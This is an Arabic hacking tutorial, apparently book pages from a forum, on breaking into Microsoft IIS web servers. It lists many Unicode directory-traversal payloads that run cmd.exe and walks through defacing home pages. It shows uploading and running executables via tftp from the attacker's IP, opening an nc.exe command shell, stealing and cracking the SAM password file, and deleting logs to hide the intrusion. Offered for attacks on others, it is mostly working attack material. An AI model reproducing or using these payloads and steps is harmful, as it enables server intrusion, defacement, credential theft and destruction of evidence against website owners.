هلتذكراني طلبت منكاقفال الفایروول ؟؟لماذا ؟<br />

لو جرب تتنفذالامر netstat -an من خلال سطراوامرالان سي ‏..فانك ستجد منالمنافذ ما یسر القلب<br />

‏%‏‎90‎منالسیرفراتاللي دخلتها وكانت محمیةبجدران نار :) وجدت المنفذ ‎139‎فیها مفتوحابدون<br />

حمایه ‏:)لذافاناقفالالفایرولقد یجعللكاكثر من خیارلاسقاطالهد ف<br />

...(:<br />

<strong>١</strong>٠٢


"<br />

hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏"معلومات عامة عن كیفیة الاستفادة من ثغرات الیونیكود<br />

$$$$$$$$$$$<br />

الكاتب:بلاكهنتر<br />

$$$$$$$$$$$<br />

الموضوعیتكلم عناسالیبالتحكمفيالسیرفر عبرالیونیكود مع بع ضالمتطلبات<br />

الادواتالمطلوبه<br />

‎<strong>١</strong>‎‏)اداة مسحثغرات یونیكود<br />

‎٢‎‏)برنامج سیرفر TFTPD<br />

٣) معرفة جیدهبالیونیكود<br />

=================================================<br />

<strong>١</strong>) بأمكانكال<br />

((<br />

http://www.devil2k.<strong>com</strong>/<br />

/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/<br />

cmd.exe?/c+dir+c:\<br />

/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+<br />

c:\<br />

/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sy<br />

stem32/cmd.exe?/c+dir+c:\<br />

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c<br />

:\<br />

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+<br />

c:\<br />

/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.ex<br />

e?/c+dir+c:\<br />

/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/<br />

cmd.exe?/c+dir+c:\<br />

/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir<br />

+c:\<br />

/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+<br />

dir+c:\<br />

/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/<br />

cmd.exe?/c+dir+c:\<br />

/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/s<br />

ystem32/cmd.exe?/c+dir+c:\<br />

/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.<br />

exe?/c+dir+c:\<br />

حصول علىثغراتالیونیكود منالعدید من المواقعاو من موقعي<br />

وهذه مهداه منيانا ‏((بلاك هنتر<br />

:<br />

<strong>١</strong>٠٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c<br />

md.exe?/c+dir+c:\<br />

/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi<br />

nnt/system32/cmd.exe?/c+dir+c:\<br />

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%<br />

35%63../winnt/system32/cmd.exe?/c+dir+c:\<br />

/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/<br />

c+dir+c:\<br />

/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm<br />

d.exe?/c+dir+c:\<br />

/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir<br />

+c:\<br />

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe<br />

?/c+dir+c:\<br />

/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.<br />

exe?/c+dir+c:\<br />

/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c<br />

md.exe?/c+dir+c:\<br />

/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi<br />

nnt/system32/cmd.exe?/c+dir+c:\<br />

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%<br />

35%63../winnt/system32/cmd.exe?/c+dir+c:\<br />

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32<br />

/cmd.exe?/c+dir+c:\<br />

/cgibin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.<br />

exe?/c+dir+c:\<br />

/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32<br />

/cmd.exe?/c+dir+c:\<br />

/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32<br />

/cmd.exe?/c+dir+c:\<br />

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste<br />

m32/cmd.exe?/c+dir+c:\<br />

/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.e<br />

xe?/c+dir+c:\<br />

/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.e<br />

xe?/c+dir+c:\<br />

<strong>١</strong>٠٤


<strong>١</strong>٠٥<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

hi_HaCkEr & MaXhAk2000<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.<br />

exe?/c+dir+c:\<br />

/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c<br />

:\<br />

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />

dir+c:\<br />

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system<br />

32/cmd.exe\?/c+dir+c:\<br />

/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd<br />

.exe?/c+dir+c:\<br />

/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3<br />

2/cmd.exe?/c+dir+c:\<br />

/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste<br />

m32/cmd.exe?/c+dir+c:\<br />

/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3<br />

2/cmd.exe?/c+dir+c:\<br />

/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3<br />

2/cmd.exe?/c+dir+c:\


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste<br />

m32/cmd.exe?/c+dir+c:\<br />

٢) بأمكانكال حصول علىبرنامج TFTPD منالموقع http://iisbughelp.4t.<strong>com</strong>/<br />

٣) معرفةالیونیكودبسیطه جدا یكفيانتعر فكی فتستطیعالانتقال عبر الهاردیسكات وعبرالملفات<br />

) تعمل عبرالمتصفح (<br />

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />

dir+C:\<br />

لقرائه مابداخلهاردیسك \ : C<br />

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />

dir+D:\<br />

لقرائه مابداخلهاردیسك \ : D<br />

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />

dir+E:\<br />

لقرائه مابداخلهاردیسك \ : E<br />

نقوم بعمل سكان على الموقعلنرى مابه منثغرات وهنا مثال علىثغرات مبتدأهبالمجلد المطلوب<br />

اغلبثغراتالیونیكودتنطلق من هذهالمجلدات<br />

))<br />

(<strong>١</strong> مثالالمجلد msadc<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />

r+C:\<br />

vti_bin_ (٢<br />

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />

dir+C:\<br />

مثالالمجلد<br />

((<br />

في سیرفرات IIS عندتركیبها ‏((بشكل عادي )) یكونالمجلدالرئیسيللویبتح تاسممعین وهو<br />

C:\Inetpub\wwwroot<br />

اوفيالمجلد<br />

D:\Inetpub\wwwroot<br />

اوفيالمجلد<br />

E:\Inetpub\wwwroot<br />

في العاده یكونفي الهاردیسك C ولذلك سأكمل شرحي علىانههناك<br />

ستجدفي هذاالمجلد عادة جمیعالمواقع التي علىالسیرفر<br />

:<br />

فلو وجدناثغرة یونیكود ما ولتكن<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

وأردناالولوج الى هذاالمل فلنرى مابهفسنكتبالثغره هكذا :<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />

r+C:\Inetpub\wwwroot<br />

<strong>١</strong>٠٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اذاكانالسیرفر یحوي عدة مواقعفستجدهاكل موقعباسمه ) ستجدهافي مجلداتبداخل مجلدال<br />

) wwwrootامالوكانالسیرفر عباره عن موقع واحدفقطفستجدكافةالملفاتفي مجلدال<br />

wwwroot نفسه<br />

فياغلبالظن یقومالهاكر بتغییرالصفحةالرئیسیهالاولى وعلیكانتعلمانهلیس دائماالصفحةالرئیسیه<br />

الاولىتحملاسم index.htm<br />

هناك عدةتسمیات وأختصاراتلها وهذه بعضها<br />

(( معظمها ))<br />

index.htm<br />

index.asp<br />

default.htm<br />

default.asp<br />

main.htm<br />

main.asp<br />

لنفر ضالاناننا وجدناانالصفحةالرئیسیهللموقعفي مجلدنا wwwroot هي index.htmفكی ف<br />

سنقوم بتغییرها وهو ما یهمناتقریبا من عملیةالاختراق هذه سنقوماولا بتغییراسمالمل ف من<br />

index.htm الىاياسماخر یخطر ببالك ولیكن ss.htm طبعا سنرسلالامر عبرثغرةالیونیكود من<br />

(( علیكانتعر فانالاوامرالتي<br />

المتصفحلدیك وسنقوم بتغییر الداله<br />

سوتضع هي نفسالاوامرالموجودهفي Dos وفي Commandفعلیكانتكون Prompt عارفابما<br />

هوالامر المراداستخدامه<br />

المهم ستكتب الثغره هكذا<br />

c + ren الداله cالى + dir<br />

:<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+re<br />

n+C:\Inetpub\wwwroot\index.htm+ss.htm<br />

(<br />

وهكذافقدتمتغییراسمالصفحة من index.htmالى ss.htm<br />

ارأیتمكمهو سهل ‏:)؟<br />

Aیبدوانكایهاالمخترقلمتكتفيباغلاقالصفحةالرئیسیهللموقعفانتتریدانتضع صفحةبموضو ع<br />

اخر ولیكنالموضو ع هو Hacked!!! فكی ف سنرسلهافي صفحة index.htm ؟؟<br />

هناك عدة طرق ومنها سأذكر هذه الطریقه وهي عبرالاتصالبمنفذ TFTPالذي ستكونفیهانتفي<br />

وضعالسیرفر والموقعالذيامامك في وضعالكلاینت<br />

كی ف سیتم هذا ؟<br />

اولاقم بتركیب نظام سیرفر TFTP على جهازك ‏(البرنامج المذكورفياولالموضو ع من افضلالبرامج<br />

وهناكبرنامجاخراكثراحترافا و لكن هذا یكفي<br />

الان ضعالسیرفرالرئیسيفي ‏\:‏Cلدیك<br />

قم بتصمیم صفحة خفیفه وسریعه وسمها index.htm وضعهافي<br />

الان نریدان نرسلللسیرفرالمل فالجدید من ‏\:‏Cلدینا الى مل ف<br />

لالیسالامرصعباففي نظم میكروسوفت یوجدامر ‏((هوبالأصحبرنامجا منفصلا<br />

وهو عباره عنكلاین تبسیط یستخدم بروتوكول TFTP وهوبروتوكولبسیط جدا جدا ‏((یسمیهالبع ض<br />

البروتوكولالتافه )) یقومبسحباوارسالالملفات من والىالجهاز ون حن نریدان یسحب ملفا من جهازنا<br />

فكیفلنا ذلك ؟<br />

طبعالوكنافي غیرالیونیكودلكتبناتولیفةالامرالتالي<br />

C:\<br />

C:\inetpub\wwwroot<br />

‏))یحملاسم TFTP<br />

:<br />

tftp.exe -i XXX.XXX.XXX.XXX get index.htm<br />

C:\inetpub\wwwroot\index.htm<br />

<strong>١</strong>٠٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

(( XXX.XXX.XXX.XXXتعنيايبيالسیرفرالمراد سحبالمل ف منه ))<br />

فيتولیفة هذاالامر یقوم الكلاین تبطلب المل ف المسمى index.htmلیضعهفي جهازهفي المجلد<br />

wwwroot<br />

ولكن لاتنسىفشكلتولیفةالاوامر یختل ف منالوضعالعادي عن وضعالیونیكودفما هو الحل ؟<br />

الحل هوانتحولتولیفةالامرالى یونیكود لتضعهفيالثغرهالتيلدیك<br />

بعدت حویلالامرالى یونیكود سیصبح شكلهكالتالي<br />

:<br />

tftp.exe+"-<br />

i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm<br />

یاللروعهلقدتجاوزناالعقبهبالفعل :)<br />

الانقم بتشغیل سیرفرال TFTP وقم بتجهیز مل ف ال index.htm<br />

وقمبالاتصال مع الموقع عبرثغرةالیونیكود المضا فالیها هذهالتولیفهلیصبحفيالنهایه على هذا النحو<br />

:<br />

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t<br />

ftp.exe+"-<br />

i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm<br />

وهكذاقمنا بتحمیلالصفحةالىالانترنت وانتیهنا من عملیةالاختراق ‏((تقریبا :) ))<br />

ملحوظه ‏:یمكنكانتقوم بتحمیل ملفات EXEایضاوتشغیلها علىالسیرفربنفسالاسلوب وهذا مثال<br />

لنفر ضاننا نریدتحمیل مل ف EXE علىالسیرفر وسمیناه hunter.exe ونریدتشغیلهفكی فلنا ذلك ؟<br />

سنتبعالاتي<br />

نقوم بتحمیلالمل ف علىالسیرفركماقمنا بتحمیل index.htm ونضعهفي ‏\:‏Cللسیرفر عبر هذه<br />

التولیفه<br />

:<br />

:<br />

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t<br />

ftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe<br />

:<br />

بعدانیتمتحمیل المل ف سنشغله عبرتنفیذ هذاالامر<br />

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe<br />

او عن طریق هذاالامر<br />

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+<br />

hunter.exe<br />

log.*<br />

:<br />

الآ ن وقدقاربنا علىالانتهاء بقيلدینافيالسیرفر عمل واحدفقطالا وهو مسح ملفاتاللوج<br />

وسیكون ذلك عن طریق هذاالامر<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d<br />

el+C:\*.log/s<br />

هناكانواعاخرى منالملفاتیتمتخزینفیها بع ضالمعلومات ویفضل مسحهاایضا وهي مثلالملفات ذات<br />

الامتداد tmp<br />

:<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d<br />

el+C:\*.tmp/s<br />

وهذاامر مسحها عبرالیونیكود<br />

<strong>١</strong>٠٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ایضا ملحوظه مهمه وهيان لاتبقىايمعلومات عنكفيالسیرفركما یفعل البع ض بذكراسمائهماو<br />

ایمیلاتهمالحقیقیهقمبمسحاي شيء یدل علیكاو على عملیةالاختراق حاولانتصل الى هذا<br />

المستو ى<br />

هناك عدد منالاشیاء والا فكارلن اتطرقالیها مثلارسالفایروس مااوامر على مل ف bat حتى تتمكن<br />

من وضع مشكلهكبیرهفيالسیرفرلكيلایعمل<br />

اوانترسلفایروس یقومبمحو جمیع ملفاتالنظاماوانتمرز نفسكلدیهمفيالسیرفر عن طریقبرامج<br />

التحكم عن بعد واخفائهابشكل جیدفيالمجلدات ذات الملفاتالكثیر مثل<br />

))<br />

)) )) system32 والكثیر<br />

الكثیر<br />

<br />

((<br />

ملحوظات ‏:لنتعمل هذه الثغرهفيكل الحالاتفهناك بع ضالسیرفرات یقومون بقطعالطریق علیك عن<br />

طریق مسح مل ف tftp من سیرفراتهم<br />

) المل فالمسؤول عن ذلك موجودفيالمجلد (system32 وبع ضالسیرفراتقامت بعملیةالترقیع<br />

اصدرت میكروسوفتترقیعالهذهالثغره<br />

وبعضهمقد یكون واضعفایر وول یقومبمراقبةالباكیجالصادر والوارد وقد یقوم بعملاصطیادلمثل هذه<br />

العملیات<br />

واخرون یقومون بتركیببرنامج الحمایهالقوي جدافي نظم IISالا وهو Secure IIS من شركة<br />

))<br />

((<br />

Eeye<br />

والعدیدالعدید من العقبات ولكن عند كتابة هذاالموضو ع ‏((قبل حوالياربعةاشهر ‏))كان ما یقارب<br />

منالسیرفراتالتيفیها نظام IIS<br />

تحوي هذهالثغره وبدونترقیع (( لعدم وجوده وقتها ‏))اولأهمال المدیر.‏<br />

٩٠<br />

%<br />

<strong>١</strong>٠٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

الدلیل الكامل لإختراق سيرفر<br />

" IIS<br />

$$$$$$$$$$$$<br />

الكاتب DEMON:<br />

$$$$$$$$$$$$<br />

----------<br />

- :<br />

---------<br />

مقدمة<br />

..<br />

.<br />

یعلمالجمیع مد ىانتشار سیرفرات IIS حیثتشكل النسبةالاكبر المستخدمةفيتشغیل مواقعالانترنت<br />

ویعلمالجمیع مد ىضع ف الناحیةالامنیةلهذهالسیرفرات ‏..لذاقررتالقیامبجمعاشهرثغرات هذاالنو ع<br />

معتوضیحكیفیة عملها<br />

---------<br />

- :<br />

---------<br />

ملاحظة<br />

معظم الطرق الموجودة هناتعمل على سیرفرات IIS4.0 و IIS5.0 وجمیعهاتعتمد علىالبورت<br />

یعني من خلالالمتصفح))‏ .<br />

((٨٠<br />

-------------<br />

- :<br />

-------------<br />

-<strong>١</strong> CGI-Scanner جید<br />

) www.wiretrip.net/rfp<br />

المتطلبات<br />

‏..أناافضل)‏ Whiskerیمكنكتنزیله من هذا الموقع<br />

٢- اكتی فبیرل لتشغیل ملفاتالبیرل ‏(یمكنكتنزیله منالموقع:‏<br />

اي نو ع)‏<br />

( http://www.activestate.<strong>com</strong>/<br />

:<br />

-٣ ویب سیرفر ) اباتشياو .. IIS<br />

-----------------------<br />

IIS Hack.exe : -<br />

------------------------<br />

اكتش ف خبراءالامنفي شركة eEyeثغرةامنیةتسمحلك بتحمیل نسخه ذكیة من nc.exe وجعلها<br />

تنصت على المنفذ<br />

وهذا سیعطیك<br />

منالموقع<br />

ویجبتشغیل ویب سیرفرفي جهازكقبلتنفیذالثغرة<br />

قمبنسخاداة nc.exeوضعهافيالدلیلالرئیسيللویب سیرفرلدیك<br />

.. ٨٠<br />

سطراوامر cmde.exe معامتیازات . Administrator<br />

بامكانكانزال NC.exe و . http://www.technotronic.<strong>com</strong>/ IIS Hack.exe<br />

..<br />

‏(فياباتشي Htdocs) وفي IIS<br />

الدلیل . wwwroot<br />

ثمقم بتشغیل : IISHack.exe<br />

80 your_IP/ncx.exe http://www.target.<strong>com</strong>/c:\>iishack.exe<br />

وبعد اتمام الخطوة السابقةبنجاح<br />

:<br />

eGG SheLL وستجدامامك http://www.target.<strong>com</strong>/c:\>nc<br />

<strong>١</strong><strong>١</strong>٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ملاحظة ‏:تعمل هذه الثغرة على سیرفرات IIS4.0‎فقط<br />

‏((اذالمیتمتركیبالرقعه))‏ .<br />

do you want me to explain what to do next, hey <strong>com</strong>mon you must be<br />

kidding<br />

...hehe....<br />

..<br />

%٤٠<br />

)<br />

-----------------------<br />

MDAC = RDS :-<br />

-----------------------<br />

اعتقدانهاثغرةقدیمةقلیلا لكني ما زلتارىان من المواقعتعاني منها<br />

تسمحلك هذهالثغرة بتشغیلاوامرك علىالنظامالهد فبشكلم حلي سیتمتشغیل وامركبصفتك مستخدم<br />

SYSTEMايبصلاحیات مدیر النظام .. على العموماذااردتمعرفةاذا ماكان النظام مصابابهذه<br />

الثغرةام لا<br />

..<br />

..<br />

قماولابالاتصالبالنظامالهد ف ‎80‎ثمقمبارسال http://www.host.<strong>com</strong>/ : c:\>nc -nw -w 2<br />

الامر : GET /msadc/msadcs.dll HTTP<br />

.. ((<br />

(( www.wiretrip.net/rfp :<br />

mdac.pl - msadc2.pl )) v<br />

c:\> mdac.pl -h host.<strong>com</strong><br />

Please type the NT <strong>com</strong>mandline you want to run (cmd /c assumed):\n<br />

cmd /c<br />

فإ ذاكانالرد application/x_varg ‏:فهذایعنيان النظام مصاب ‏((اذالمیتمترقیعه<br />

بامكانكایجاد سكربتا تبیرلتسهل علیك العملفي هذا الموقع<br />

إ ذااردتتغییرالصفحهالرئیسیة ما علیكالاتنفیذ<br />

الامر > hehe : echo hacked by me<br />

C:\inetpub\wwwroot\index.htm<br />

وإ ذاأردنااحكام السیطرة على الموقعبامكانناتحمیل Hacker'sاقصد Swiss knife Army<br />

بواسطة هذاالامر<br />

:<br />

Nc.exe<br />

%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r<br />

nc.exe&&nc.exe -l -p 80 -t -e cmd.exe<br />

)<br />

قم بقراءةالامر منالیسار الىالیمین لت مكن منقراءته جیدا)‏<br />

بعدهاقمبالاتصالبالنظامالهد ف على المنفذ ٨٠ وستجد سطراوامر معامتیازات . Administrator<br />

-------------------------------------------------<br />

Codebrws.asp & Showcode.asp :-<br />

--------------------------------------------------<br />

..<br />

الملفان عبارة عنقاريء ملفات ASP یأتي مع IIS ولكنه لا یأتي محملافتراضیابل یجب على مدیر<br />

النظامتفعیله<br />

فإ ذاكانت هذهالخدمة مفعلة ستسفید منهاكثیراقهيتسمحلك بقراءةاي مل ف))‏ .asp اعني رؤیة<br />

المصدر))‏ .<br />

: ((<br />

http://www.victim.<strong>com</strong>/msadc/samples...nt/repair/sam._<br />

باستخدام هذاالامر ست حصل على مل فالسام ‏((اذاكان النظام مصابا<br />

بعد ال حصول على مل فالسام .. it Expandباستخدامالاداة it & Crack المفضلةلدي)‏ LC3.0<br />

سیتمكسرهافياقل من<br />

٢٤ ساعه ( .<br />

<strong>١</strong><strong>١</strong><strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

----------------<br />

Null.htw : -<br />

----------------<br />

عملیة شر حكیفیة عمل هذه الثغرةمعقدقلیلا ‏..لذا سأكتفيفقطبطریقةالاستفادة منها<br />

باختصارتسمحلكبرؤیةالسورسكود لاي مل ف .. ASP<br />

لتنفیذ الثغرة:‏<br />

سیعر ضلك هذا الراب طالسورسكودالخا صبالصفحه . Default.asp<br />

..<br />

http://www.victim.<strong>com</strong>/null.htw?CiWe...HiliteType=full<br />

------------------------------<br />

webhits.dll & .htw : -<br />

------------------------------<br />

http://www.victim.<strong>com</strong>/blabla.htw :<br />

فإ ذاكانالردبهذه العبارة format of the QUERY_STRING is invalid ‏:فهذایعنيان<br />

. %٩٠<br />

:<br />

www.victim.<strong>com</strong>/xxxxxxxxx/xxxxxxxx/x...hilitetype=full<br />

اولاقم بتجربة اللنك على النظامالهد ف<br />

النظام الهد ف مصاببنسبة<br />

اخیرا جربتنفیذالثغرةبهذهالطریقة<br />

معتغییرال XXXXX/XXXXX/XXXX/XXX.htwباحد هذهالملحقات ، وبالتأكید سیعملاحدها<br />

iissamples/issamples/oop/qfullhit.htw<br />

iissamples/issamples/oop/qsumrhit.htw<br />

isssamples/exair/search/qfullhit.htw<br />

isssamples/exair/search/qsumrhit.htw<br />

وبالتالي ست حصل على مل فالسامقم بكسرهبواسطهالاداة .. LC3<br />

:<br />

-------------------------------------------------------<br />

[$DATA] ASP Alternate Data Streams:-<br />

-------------------------------------------------------<br />

هذه الثغرةكانتبدایتها منذالعام .. <strong>١</strong>٩٩٨ وهي مخصصةبالتحدیدلسیرفرا ت IIS3.0 والانتعمل على<br />

بع ض سیرفرات .. IIS4.0<br />

ومهمتها عر ض السورسكود لاي صفحه (( البع ضیتساءل مالفائدة من عر ض سورسالصفحه ؟؟<br />

الاجابةان بع ضالصفحاتتحتوي على معلومات مهمة مثلكلمات مرورقواعدالبیانات مثل<br />

((<br />

Global.asa<br />

یمكنتنفیذالثغرة منالمتصفحبواسطة هذا الأمر<br />

http://www.victim.<strong>com</strong>/default.asp::<br />

$DATA<br />

<strong>١</strong><strong>١</strong>٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

-----------------------<br />

ASP dot bug : -<br />

-----------------------<br />

ربمااقدمثغرةفي هذاالن ص هي هذهالثغرة حی ثتقومایضا بعر ض السورسكودالخا ص بأي صفحه<br />

..<br />

:<br />

حیثتم اكتشافهافيالعام .. <strong>١</strong>٩٩٧<br />

ویتمتنفیذها منالمتصفحبهذا الشكل<br />

‏.‏http://www.victim.<strong>com</strong>/sample.aspلاحظ النقطة الموجودةفياخر السطر<br />

وهيفق طتعمل على سیرفرات . IIS3.0<br />

..<br />

-------------------------------------------<br />

ISM.DLL Buffer Truncation : -<br />

-------------------------------------------<br />

..<br />

خطأبرمجي یسمحللمهاجمبسحب الملفات ورؤویةالسورسكودایضا<br />

وفكرة الثغرة هيالتحایل علىالسیرفربإیهامهانناقمنا یطلب مل ف ما .. وفيالحقیقة ن حن نقومبطلب<br />

ملفاخر<br />

المل ف المسؤوول عن هذا الخطأ هو ISM.dll حی ثیتمتحمیله بعددكبیر منالرموز المسافة (% ٢٠ )<br />

Space .<br />

:<br />

(...


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

----------------<br />

site.csc : -<br />

----------------<br />

